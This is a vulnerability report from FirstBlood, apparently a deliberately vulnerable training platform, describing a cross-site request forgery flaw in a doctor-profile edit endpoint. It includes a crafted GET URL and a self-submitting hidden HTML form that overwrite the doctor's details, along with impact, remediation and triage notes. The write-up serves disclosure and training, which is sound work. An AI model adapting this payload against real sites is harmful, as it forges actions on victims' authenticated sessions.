FirstBlood-#1383Edit doctor details with CSRF
This issue was discovered on FirstBlood v3



On 2022-12-09, pichik Level 4 reported:

Hi,
I found that request which edits doctor details is vulnerable to CSRF.

DESCRIPTION

I am not sure if these are two separated bugs or just one, as you can do this with POST and GET request.

Here are edit doctor requests without csrf token:
POST:

GET:

POC:

Link for GET request: https://019046743f9e-pichik.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php?drid=1&name=PWND&bio=PWND&bookable=1

CSRF Payload:

<html>
<form id="1" action="https://019046743f9e-pichik.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php" method="post" enctype="application/x-www-form-urlencoded">
<input name='name' value='PWND' type='hidden'>
<input name='drid' value='1' type='hidden'>
<input name='bio' value='PWND' type='hidden'>
<input name='bookable' value='1' type='hidden'>
</form> 
<script>
document.getElementById("1").submit()
</script>
</html>

This is working only in firefox, as Chrome is not sending cookies.
(I guess its because SameSite flag in Cookie is blank, but not sure)

Impact

Attacker can edit doctor details or insert XSS payload which I reported before.

REMEDIATION

Request contains csrf token, but this token do nothing.
Forbiding changes with GET requests and implementation CSRF token in server side should fix this issue.

P4 Low

Endpoint: /drpanel/drapi/edit-dr.php

Parameter: csrf

Payload: -


FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery

There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and lack of token validation. It was intended that a POST request does not work due to no cookies sent on the request (because of SameSite), but to an over sight this cookie was overwritten rendering it useless.